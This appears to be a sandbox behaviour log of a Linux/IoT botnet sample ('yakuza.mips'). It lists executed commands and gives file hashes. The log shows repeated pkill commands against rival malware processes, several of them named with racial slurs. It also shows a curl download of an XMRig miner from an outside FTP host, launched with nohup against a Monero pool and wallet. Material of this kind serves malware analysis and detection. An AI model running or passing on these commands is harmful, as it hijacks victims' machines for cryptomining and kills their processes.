[grep 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW]

/bin/sh

[sh -c pkill -9 sysgpu || busybox pkill -9 sysgpu]

/usr/bin/pkill

[pkill -9 sysgpu]

/usr/bin/curl

[curl -O ftp://linux-it.abuser.eu/xmrig-lnx/xmrig]

/bin/busybox

[busybox pkill -9 sysgpu]

/bin/sh

[sh -c pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd]

/usr/bin/pkill

[pkill -9 NiGGeR69xd]

/bin/busybox

[busybox pkill -9 NiGGeR69xd]

/bin/sh

[sh -c pkill -9 frgege || busybox pkill -9 frgege]

/usr/bin/pkill

[pkill -9 frgege]

/bin/busybox

[busybox pkill -9 frgege]

/bin/sh

[sh -c pkill -9 sysupdater || busybox pkill -9 sysupdater]

/usr/bin/pkill

[pkill -9 sysupdater]

/bin/busybox

[busybox pkill -9 sysupdater]

/bin/sh

[sh -c pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd]

/usr/bin/pkill

[pkill -9 0DnAzepd]

/bin/busybox

[busybox pkill -9 0DnAzepd]

/bin/sh

[sh -c pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69]

/usr/bin/pkill

[pkill -9 NiGGeRD0nks69]

/bin/busybox

[busybox pkill -9 NiGGeRD0nks69]

/bin/sh

[sh -c pkill -9 frgreu || busybox pkill -9 frgreu]

/usr/bin/pkill

[pkill -9 frgreu]

/bin/busybox

[busybox pkill -9 frgreu]

/bin/sh

[sh -c pkill -9 telnetd || busybox pkill -9 telnetd]

/usr/bin/pkill

[pkill -9 telnetd]

/bin/busybox

[busybox pkill -9 telnetd]

/bin/sh

[sh -c pkill -9 0x766f6964 || busybox pkill -9 0x766f6964]

/usr/bin/pkill

[pkill -9 0x766f6964]

/bin/busybox

[busybox pkill -9 0x766f6964]

/bin/sh

[sh -c pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337]

/usr/bin/pkill

[pkill -9 NiGGeRd0nks1337]

/bin/busybox

[busybox pkill -9 NiGGeRd0nks1337]

/bin/sh

[sh -c pkill -9 gaft || busybox pkill -9 gaft]

/usr/bin/pkill

[pkill -9 gaft]

/bin/busybox

[busybox pkill -9 gaft]

/bin/sh

[sh -c pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa]

/usr/bin/pkill

[pkill -9 urasgbsigboa]

/bin/busybox

[busybox pkill -9 urasgbsigboa]

/bin/sh

[sh -c pkill -9 120i3UI49 || busybox pkill -9 120i3UI49]

/usr/bin/pkill

[pkill -9 120i3UI49]

/bin/busybox

[busybox pkill -9 120i3UI49]

/bin/chmod

[chmod +x xmrig]

/usr/bin/nohup

[nohup ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker554 --tls --cpu-priority=3 --asm=auto]

/tmp/xmrig

[./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker554 --tls --cpu-priority=3 --asm=auto]

/bin/sh

[/bin/sh ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker554 --tls --cpu-priority=3 --asm=auto]

/bin/sh

[sh -c pkill -9 OaF3 || busybox pkill -9 OaF3]

/usr/bin/pkill

[pkill -9 OaF3]

/bin/busybox

[busybox pkill -9 OaF3]

/bin/sh

[sh -c pkill -9 geae || busybox pkill -9 geae]

/usr/bin/pkill

[pkill -9 geae]

/bin/busybox

[busybox pkill -9 geae]

/bin/sh

[sh -c pkill -9 vaiolmao || busybox pkill -9 vaiolmao]

/usr/bin/pkill

[pkill -9 vaiolmao]

/bin/busybox

[busybox pkill -9 vaiolmao]

/bin/sh

[sh -c pkill -9 123123a || busybox pkill -9 123123a]

/usr/bin/pkill

[pkill -9 123123a]

/bin/busybox

[busybox pkill -9 123123a]

/bin/sh

[sh -c pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D]

/usr/bin/pkill

[pkill -9 Ofurain0n4H34D]

/bin/busybox

[busybox pkill -9 Ofurain0n4H34D]

/bin/sh

[sh -c pkill -9 ggTrex || busybox pkill -9 ggTrex]

/usr/bin/pkill

[pkill -9 ggTrex]

/bin/busybox

[busybox pkill -9 ggTrex]

/bin/sh

[sh -c pkill -9 wasads || busybox pkill -9 wasads]

/usr/bin/pkill

[pkill -9 wasads]

/bin/busybox

[busybox pkill -9 wasads]

/bin/sh

[sh -c pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD]

/usr/bin/pkill

[pkill -9 1293194hjXD]

/bin/busybox

[busybox pkill -9 1293194hjXD]

/bin/sh

[sh -c pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn]

/usr/bin/pkill

[pkill -9 OthLaLosn]

/bin/busybox

[busybox pkill -9 OthLaLosn]

/bin/sh

[sh -c pkill -9 ggt || busybox pkill -9 ggt]

/usr/bin/pkill

[pkill -9 ggt]

/bin/busybox

[busybox pkill -9 ggt]

/bin/sh

[sh -c pkill -9 wget-log || busybox pkill -9 wget-log]

/usr/bin/pkill

[pkill -9 wget-log]

/bin/busybox

[busybox pkill -9 wget-log]

/bin/sh

[sh -c pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER]

/usr/bin/pkill

[pkill -9 1337SoraLOADER]

/bin/busybox

[busybox pkill -9 1337SoraLOADER]

/bin/sh

[sh -c pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA]

/usr/bin/pkill

[pkill -9 SAIAKINA]

/bin/busybox

[busybox pkill -9 SAIAKINA]

/bin/sh

[sh -c pkill -9 ggtq || busybox pkill -9 ggtq]

/usr/bin/pkill

[pkill -9 ggtq]

/bin/busybox

[busybox pkill -9 ggtq]

/bin/sh

[sh -c pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2]

/usr/bin/pkill

[pkill -9 1378bfp919GRB1Q2]

/bin/busybox

[busybox pkill -9 1378bfp919GRB1Q2]

/bin/sh

[sh -c pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO]

/usr/bin/pkill

[pkill -9 SAIAKUSO]

/bin/busybox

[busybox pkill -9 SAIAKUSO]

/bin/sh

[sh -c pkill -9 ggtr || busybox pkill -9 ggtr]

/usr/bin/pkill

[pkill -9 ggtr]

/bin/busybox

[busybox pkill -9 ggtr]

/bin/sh

[sh -c pkill -9 14Fa || busybox pkill -9 14Fa]

/usr/bin/pkill

[pkill -9 14Fa]

/bin/busybox

[busybox pkill -9 14Fa]

/bin/sh

[sh -c pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337]

/usr/bin/pkill

[pkill -9 SEXSLAVE1337]

/bin/busybox

[busybox pkill -9 SEXSLAVE1337]

/bin/sh

[sh -c pkill -9 ggtt || busybox pkill -9 ggtt]

/usr/bin/pkill

[pkill -9 ggtt]

/bin/busybox

[busybox pkill -9 ggtt]

/bin/sh

[sh -c pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4]

/usr/bin/pkill

[pkill -9 1902a3u912u3u4]

/bin/busybox

[busybox pkill -9 1902a3u912u3u4]

/bin/sh

[sh -c pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X]

/usr/bin/pkill

[pkill -9 SO190Ij1X]

/bin/busybox

[busybox pkill -9 SO190Ij1X]

/bin/sh

[sh -c pkill -9 haetrghbr || busybox pkill -9 haetrghbr]

/usr/bin/pkill

[pkill -9 haetrghbr]

/bin/busybox

[busybox pkill -9 haetrghbr]

/bin/sh

[sh -c pkill -9 19ju3d || busybox pkill -9 19ju3d]

/usr/bin/pkill

[pkill -9 19ju3d]

/bin/busybox

[busybox pkill -9 19ju3d]

/bin/sh

[sh -c pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120]

/usr/bin/pkill

[pkill -9 SORAojkf120]

/bin/busybox

[busybox pkill -9 SORAojkf120]

/bin/sh

[sh -c pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92]

/usr/bin/pkill

[pkill -9 hehahejeje92]

/bin/busybox

[busybox pkill -9 hehahejeje92]

/bin/sh

[sh -c pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91]

/usr/bin/pkill

[pkill -9 2U2JDJA901F91]

/bin/busybox

[busybox pkill -9 2U2JDJA901F91]

/bin/sh

[sh -c pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12]

/usr/bin/pkill

[pkill -9 SlaVLav12]

/bin/busybox

[busybox pkill -9 SlaVLav12]

/bin/sh

[sh -c pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh]

/usr/bin/pkill

[pkill -9 helpmedaddthhhhh]

/bin/busybox

[busybox pkill -9 helpmedaddthhhhh]

/bin/sh

[sh -c pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq]

/usr/bin/pkill

[pkill -9 2wgg9qphbq]

/bin/busybox

[busybox pkill -9 2wgg9qphbq]

/bin/sh

[sh -c pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices]

/usr/bin/pkill

[pkill -9 Slav3Th3seD3vices]

/bin/busybox

[busybox pkill -9 Slav3Th3seD3vices]

/bin/sh

[sh -c pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ]

/usr/bin/pkill

[pkill -9 hzSmYZjYMQ]

/bin/busybox

[busybox pkill -9 hzSmYZjYMQ]

/bin/sh

[sh -c pkill -9 5Gbf || busybox pkill -9 5Gbf]

/usr/bin/pkill

[pkill -9 5Gbf]

/bin/busybox

[busybox pkill -9 5Gbf]

/bin/sh

[sh -c pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL]

/usr/bin/pkill

[pkill -9 SoRAxD123LOL]

/bin/busybox

[busybox pkill -9 SoRAxD123LOL]

/bin/sh

[sh -c pkill -9 iaGv || busybox pkill -9 iaGv]

/usr/bin/pkill

[pkill -9 iaGv]

/bin/busybox

[busybox pkill -9 iaGv]

/bin/sh

[sh -c pkill -9 5aA3 || busybox pkill -9 5aA3]

/usr/bin/pkill

[pkill -9 5aA3]

/bin/busybox

[busybox pkill -9 5aA3]

/bin/sh

[sh -c pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL]

/usr/bin/pkill

[pkill -9 SoRAxD420LOL]

/bin/busybox

[busybox pkill -9 SoRAxD420LOL]

/bin/sh

[sh -c pkill -9 insomni || busybox pkill -9 insomni]

/usr/bin/pkill

[pkill -9 insomni]

/bin/busybox

[busybox pkill -9 insomni]

/bin/sh

[sh -c pkill -9 640277 || busybox pkill -9 640277]

/usr/bin/pkill

[pkill -9 640277]

/bin/busybox

[busybox pkill -9 640277]

/bin/sh

[sh -c pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337]

/usr/bin/pkill

[pkill -9 SoraBeReppin1337]

/bin/busybox

[busybox pkill -9 SoraBeReppin1337]

/bin/sh

[sh -c pkill -9 ipcamCache || busybox pkill -9 ipcamCache]

/usr/bin/pkill

[pkill -9 ipcamCache]

/bin/busybox

[busybox pkill -9 ipcamCache]

/bin/sh

[sh -c pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q]

/usr/bin/pkill

[pkill -9 66tlGg9Q]

/bin/busybox

[busybox pkill -9 66tlGg9Q]

/bin/sh

[sh -c pkill -9 T || busybox pkill -9 T]

/usr/bin/pkill

[pkill -9 T]

/bin/busybox

[busybox pkill -9 T]

/bin/sh

[sh -c pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87]

/usr/bin/pkill

[pkill -9 jUYfouyf87]

/bin/busybox

[busybox pkill -9 jUYfouyf87]

/bin/sh

[sh -c pkill -9 6ke3 || busybox pkill -9 6ke3]

/usr/bin/pkill

[pkill -9 6ke3]

/bin/busybox

[busybox pkill -9 6ke3]

/bin/sh

[sh -c pkill -9 TOKYO3 || busybox pkill -9 TOKYO3]

/usr/bin/pkill

[pkill -9 TOKYO3]

/bin/busybox

[busybox pkill -9 TOKYO3]

/bin/sh

[sh -c pkill -9 lyEeaXul2dULCVxh || busybox pkill -9 lyEeaXul2dULCVxh]

/usr/bin/pkill

[pkill -9 lyEeaXul2dULCVxh]

/bin/busybox

[busybox pkill -9 lyEeaXul2dULCVxh]

/bin/sh

[sh -c pkill -9 93OfjHZ2z || busybox pkill -9 93OfjHZ2z]

/usr/bin/pkill

[pkill -9 93OfjHZ2z]

/bin/busybox

[busybox pkill -9 93OfjHZ2z]

/bin/sh

[sh -c pkill -9 TY2gD6MZvKc7KU6r || busybox pkill -9 TY2gD6MZvKc7KU6r]

/usr/bin/pkill

[pkill -9 TY2gD6MZvKc7KU6r]

/bin/busybox

[busybox pkill -9 TY2gD6MZvKc7KU6r]

/bin/sh

[sh -c pkill -9 mMkiy6f87l || busybox pkill -9 mMkiy6f87l]

/usr/bin/pkill

[pkill -9 mMkiy6f87l]

/bin/busybox

[busybox pkill -9 mMkiy6f87l]

/bin/sh

[sh -c pkill -9 A023UU4U24UIU || busybox pkill -9 A023UU4U24UIU]

/usr/bin/pkill

[pkill -9 A023UU4U24UIU]

/bin/busybox

[busybox pkill -9 A023UU4U24UIU]

/bin/sh

[sh -c pkill -9 TheWeeknd || busybox pkill -9 TheWeeknd]

/usr/bin/pkill

[pkill -9 TheWeeknd]

/bin/busybox

[busybox pkill -9 TheWeeknd]

/bin/sh

[sh -c pkill -9 mioribitches || busybox pkill -9 mioribitches]

/usr/bin/pkill

[pkill -9 mioribitches]

/bin/busybox

[busybox pkill -9 mioribitches]

/bin/sh

[sh -c pkill -9 A5p9 || busybox pkill -9 A5p9]

/usr/bin/pkill

[pkill -9 A5p9]

/bin/busybox

[busybox pkill -9 A5p9]

/bin/sh

[sh -c pkill -9 TheWeeknds || busybox pkill -9 TheWeeknds]

/usr/bin/pkill

[pkill -9 TheWeeknds]

/bin/busybox

[busybox pkill -9 TheWeeknds]

/bin/sh

[sh -c pkill -9 mnblkjpoi || busybox pkill -9 mnblkjpoi]

/usr/bin/pkill

[pkill -9 mnblkjpoi]

/bin/busybox

[busybox pkill -9 mnblkjpoi]

/bin/sh

[sh -c pkill -9 AbAd || busybox pkill -9 AbAd]

/usr/bin/pkill

[pkill -9 AbAd]

/bin/busybox

[busybox pkill -9 AbAd]

/bin/sh

[sh -c pkill -9 Tokyos || busybox pkill -9 Tokyos]

/usr/bin/pkill

[pkill -9 Tokyos]

/bin/busybox

[busybox pkill -9 Tokyos]

/bin/sh

[sh -c pkill -9 neb || busybox pkill -9 neb]

/usr/bin/pkill

[pkill -9 neb]

/bin/busybox

[busybox pkill -9 neb]

/bin/sh

[sh -c pkill -9 Akiru || busybox pkill -9 Akiru]

/usr/bin/pkill

[pkill -9 Akiru]

/bin/busybox

[busybox pkill -9 Akiru]

/bin/sh

[sh -c pkill -9 U8inTz || busybox pkill -9 U8inTz]

/usr/bin/pkill

[pkill -9 U8inTz]

/bin/busybox

[busybox pkill -9 U8inTz]

/bin/sh

[sh -c pkill -9 netstats || busybox pkill -9 netstats]

/usr/bin/pkill

[pkill -9 netstats]

/bin/busybox

[busybox pkill -9 netstats]

/bin/sh

[sh -c pkill -9 Alex || busybox pkill -9 Alex]

/usr/bin/pkill

[pkill -9 Alex]

/bin/busybox

[busybox pkill -9 Alex]

/bin/sh

[sh -c pkill -9 W9RCAKM20T || busybox pkill -9 W9RCAKM20T]

/usr/bin/pkill

[pkill -9 W9RCAKM20T]

/bin/busybox

[busybox pkill -9 W9RCAKM20T]

/bin/sh

[sh -c pkill -9 newnetword || busybox pkill -9 newnetword]

/usr/bin/pkill

[pkill -9 newnetword]

/bin/busybox

[busybox pkill -9 newnetword]

/bin/sh

[sh -c pkill -9 Ayo215 || busybox pkill -9 Ayo215]

/usr/bin/pkill

[pkill -9 Ayo215]

/bin/busybox

[busybox pkill -9 Ayo215]

/bin/sh

[sh -c pkill -9 Word || busybox pkill -9 Word]

/usr/bin/pkill

[pkill -9 Word]

/bin/busybox

[busybox pkill -9 Word]

/bin/sh

[sh -c pkill -9 nloads || busybox pkill -9 nloads]

/usr/bin/pkill

[pkill -9 nloads]

/bin/busybox

[busybox pkill -9 nloads]

/bin/sh

[sh -c pkill -9 BAdAsV || busybox pkill -9 BAdAsV]

/usr/bin/pkill

[pkill -9 BAdAsV]

/bin/busybox

[busybox pkill -9 BAdAsV]

/bin/sh

[sh -c pkill -9 Wordmane || busybox pkill -9 Wordmane]

/usr/bin/pkill

[pkill -9 Wordmane]

/bin/busybox

[busybox pkill -9 Wordmane]

/bin/sh

[sh -c pkill -9 notyakuzaa || busybox pkill -9 notyakuzaa]

/usr/bin/pkill

[pkill -9 notyakuzaa]

/bin/busybox

[busybox pkill -9 notyakuzaa]

/bin/sh

[sh -c pkill -9 Belch || busybox pkill -9 Belch]

/usr/bin/pkill

[pkill -9 Belch]

/bin/busybox

[busybox pkill -9 Belch]

/bin/sh

[sh -c pkill -9 Wordnets || busybox pkill -9 Wordnets]

/usr/bin/pkill

[pkill -9 Wordnets]

/bin/busybox

[busybox pkill -9 Wordnets]

/bin/sh

[sh -c pkill -9 obp || busybox pkill -9 obp]

/usr/bin/pkill

[pkill -9 obp]

/bin/busybox

[busybox pkill -9 obp]

/bin/sh

[sh -c pkill -9 BigN0gg0r420 || busybox pkill -9 BigN0gg0r420]

/usr/bin/pkill

[pkill -9 BigN0gg0r420]

/bin/busybox

[busybox pkill -9 BigN0gg0r420]

/bin/sh

[sh -c pkill -9 X0102I34f || busybox pkill -9 X0102I34f]

/usr/bin/pkill

[pkill -9 X0102I34f]

/bin/busybox

[busybox pkill -9 X0102I34f]

/bin/sh

[sh -c pkill -9 ofhasfhiafhoi || busybox pkill -9 ofhasfhiafhoi]

/usr/bin/pkill

[pkill -9 ofhasfhiafhoi]

/bin/busybox

[busybox pkill -9 ofhasfhiafhoi]

/bin/sh

[sh -c pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY]

/usr/bin/pkill

[pkill -9 BzSxLxBxeY]

/bin/busybox

[busybox pkill -9 BzSxLxBxeY]

/bin/sh

[sh -c pkill -9 X19I239124UIU || busybox pkill -9 X19I239124UIU]

/usr/bin/pkill

[pkill -9 X19I239124UIU]

/bin/busybox

[busybox pkill -9 X19I239124UIU]

/bin/sh

[sh -c pkill -9 oism || busybox pkill -9 oism]

/usr/bin/pkill

[pkill -9 oism]

/bin/busybox

[busybox pkill -9 oism]

/bin/sh

[sh -c pkill -9 Deported || busybox pkill -9 Deported]

/usr/bin/pkill

[pkill -9 Deported]

/bin/busybox

[busybox pkill -9 Deported]

/bin/sh

[sh -c pkill -9 XSHJEHHEIIHWO || busybox pkill -9 XSHJEHHEIIHWO]

/usr/bin/pkill

[pkill -9 XSHJEHHEIIHWO]

/bin/busybox

[busybox pkill -9 XSHJEHHEIIHWO]

/bin/sh

[sh -c pkill -9 olsVNwo12 || busybox pkill -9 olsVNwo12]

/usr/bin/pkill

[pkill -9 olsVNwo12]

/bin/busybox

[busybox pkill -9 olsVNwo12]

/bin/sh

[sh -c pkill -9 DeportedDeported || busybox pkill -9 DeportedDeported]

/usr/bin/pkill

[pkill -9 DeportedDeported]

/bin/busybox

[busybox pkill -9 DeportedDeported]

/bin/sh

[sh -c pkill -9 XkTer0GbA1 || busybox pkill -9 XkTer0GbA1]

/usr/bin/pkill

[pkill -9 XkTer0GbA1]

/bin/busybox

[busybox pkill -9 XkTer0GbA1]

Network


Files

/tmp/yakuza.mips

MD5 371732a722f576ce663cf832412521a8
SHA1 7d8f25bfc26af545c568ffc5c0afe8c4cd35de40
SHA256 11bd15eeca11f8fcb46cce41f4387505027446b5ba8774d2b7bd759bcdb1b9d0
SHA512 c2174eeaf058a5d78d2bb7e417373c56d5b407072de68aaae33c690fd14b93a033ef4aeb18f9a364541e51b6cfc0a28c93efbb4a1857a15b875d420e9886c014

/tmp/xmrig

MD5 8f4fff0ded94f1141768220906abfbb8
SHA1 ea7c97294f415dc8713ac8c280b3123da62f6e56
SHA256 b0e1ae6d73d656b203514f498b59cbcf29f067edf6fbd3803a3de7d21960848d
SHA512 0096072a1482f8e7999867baa3dd6e96d51591e9f7645c9ff276b53984957025c83e1fe52e5c4f55639eeed2bdbd80bbd57d7dacd84468ce09c834e39dfc4bee